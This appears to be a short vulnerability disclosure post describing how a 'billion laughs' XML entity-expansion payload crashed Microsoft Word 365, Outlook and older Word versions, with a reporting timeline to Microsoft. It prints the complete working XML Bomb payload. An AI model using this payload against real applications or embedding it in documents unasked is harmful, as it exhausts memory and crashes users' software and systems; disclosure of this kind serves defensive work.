Crashing MS Word 365 client, Outlook and other office products with XML Bomb payload

Once, I have been writing pen test report for one of my clients. I wrote the report, of course, using the most popular text editor - Microsoft Word.
I was very surprised when Word stopped responding after inserting the payload used to perform XML Bomb DoS attack. I repeated the test with the same result, stating that the program ate all the available RAM.
The tested version was current version at the moment - a thick client supplied with Office 365 (MSO (16.0.10228.20134 64 bit). I also checked other MS Office programs - Outlook and older versions of Word were also affected.
Look at the movies.

Timeline:
2018-08-06: Microsoft replay:

2018-08-01: Microsoft requested about more information
2018-07-31: Issue reported

Payload used to DoS MS Word:

<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Take a look at RAM usage

Outlook is also affected

One more crash of MS Word

After less then 3 minutes Windows turns off